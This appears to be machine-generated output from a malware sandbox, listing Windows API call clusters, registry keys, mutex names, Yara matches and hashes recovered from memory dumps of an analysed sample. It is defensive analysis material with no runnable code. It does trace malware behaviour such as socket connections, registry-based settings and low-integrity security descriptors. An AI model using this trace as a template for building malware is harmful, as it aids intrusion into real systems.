                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 698893E4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-2192386419
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BE1314
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02BE131F
                                                                                                                                                                                                            • htonl.WS2_32(000000FF), ref: 02BE132A
                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 02BE1336
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 02BE1350
                                                                                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 02BE1363
                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 02BE136E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 298246419-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BBD860,00000000,00000000,00000000), ref: 02BBD8A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?), ref: 02BBD8CD
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD910
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBD917
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBD92B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 731183410-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC5B18
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02BC6C37,698895c5a,00000000,?,00000000,?), ref: 02BC5B5A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02BC6C37), ref: 02BC5B64
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(-80000001), ref: 02BC5B2A
                                                                                                                                                                                                              • Part of subcall function 02BB3420: IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(02BC5B76,69889322a,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(?,69889322a,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698895c5a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-181604564
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                            • API String ID: 4133869067-1576788796
                                                                                                                                                                                                            • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                            • shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                            • recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                            • closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1638183600-0
                                                                                                                                                                                                            • Opcode ID: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                            • Instruction ID: 4c186b00760b2f8fd01949405e0fc233ed56aee6f43434fc364ee06110437276
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0A4B2950718BBE7309A64CC45F9B3B6CEB48790F004444BB04BB180D6B4B800CFE4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02BB3B25,?), ref: 02BB38C0
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,6988939ca,00000000,00000004,?,00000004,?,?,02BB3B25,?), ref: 02BB38DC
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38EA
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38F8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 6988939ca$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-1519107699
                                                                                                                                                                                                            • Opcode ID: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                            • Instruction ID: 72f9eb0a350d877dc83aa5de527ef66f268be27ba4172f40b2360f624016b842
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F036B5B40304FBEB20CAA1CD4AFAA777CEF04744F504494FB01D7140D7B1AA109795
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD193E
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02BD195B
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD1962
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD1974
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 1370207991-2011349651
                                                                                                                                                                                                            • Opcode ID: 76e2330374699abc0b8d7742c765ac8931b70a5310b2ccd9c470c172532d8a44
                                                                                                                                                                                                            • Instruction ID: f3ef4ae27ef25e503a5ff0a24e55c1e5b7e2917cea2d26b22a73af9df9b1d24b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e2330374699abc0b8d7742c765ac8931b70a5310b2ccd9c470c172532d8a44
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F0E97099621477E3705BA99C09B9F7BACDF04B85F440694FB09A7180E7A4461147E1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02BCB98E
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02BCB9AB
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB9B2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB9C4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB9D5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
                                                                                                                                                                                                            • API String ID: 1370207991-2598904463
                                                                                                                                                                                                            • Opcode ID: d9d08b17d6248707af68779263803e972be9044205a14da87876b2f226c02334
                                                                                                                                                                                                            • Instruction ID: 411c9387f95723521db05a81b3024383851d673268e7b3ca2fef773afded24dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d08b17d6248707af68779263803e972be9044205a14da87876b2f226c02334
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F08230992614B7E6705BAA9D0AB9E7B5CDF02B99F500586FB05A71C09BF0561087E1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                            • Instruction ID: 3597fc924cee0faf7a5fc5a14788891d31f161c4a9f7e79458bc170d146ce235
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A01B172A86204ABD720ABF5FC88F9B7B5CEB84B95F014A23F60487100D7369810CBF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02BD8AF4
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02BD9447), ref: 02BD8B0E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD8B36
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02BD9447), ref: 02BD8B42
                                                                                                                                                                                                              • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                              • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD8B6E
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00140B17,02BD9447,00000000,00140B17), ref: 02BD8BA0
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
• API String ID: 3741995677-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GdiFlush.GDI32(00000000,?,00000000), ref: 02BB88B6
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB88C4
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,?), ref: 02BB88DA
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 02BB88E6
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BB88F3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB8915
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
• API String ID: 3485819771-0
                                                                                                                                                                                                            APIs
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: callocexitfree
• API String ID: 3367576030-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD52EB
                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD531C
                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 02BD5338
                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 02BD533E
                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD534C
                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD5364
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
• API String ID: 1800058468-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBBAAF
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBBAD4
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBBAE2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02BBBB17
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBBB1E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBBB2E
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
• API String ID: 1675675969-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBB92D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB94B
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02BBB980
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB987
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB99B
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000005), ref: 02BBB9AA
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
• API String ID: 699575883-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowRect.USER32(02BBCD24,00000000), ref: 02BBCBFF
                                                                                                                                                                                                            • GetWindowLongA.USER32(02BBCD24,000000F0), ref: 02BBCC19
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(02BBCD24,000000FA,?), ref: 02BBCC34
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(02BBCD24,000000FB,0000003C), ref: 02BBCC61
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 4167475372-4251816714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41AB
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41C1
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 02BF41D3
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41EF
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02BF420E
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02BF421C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,76F92F00,02BC3D3F), ref: 02BB791C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB7923
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7933
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,76F92F00,02BC3D3F), ref: 02BB7955
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB7958
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7965
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB7968
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4191958461-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4215
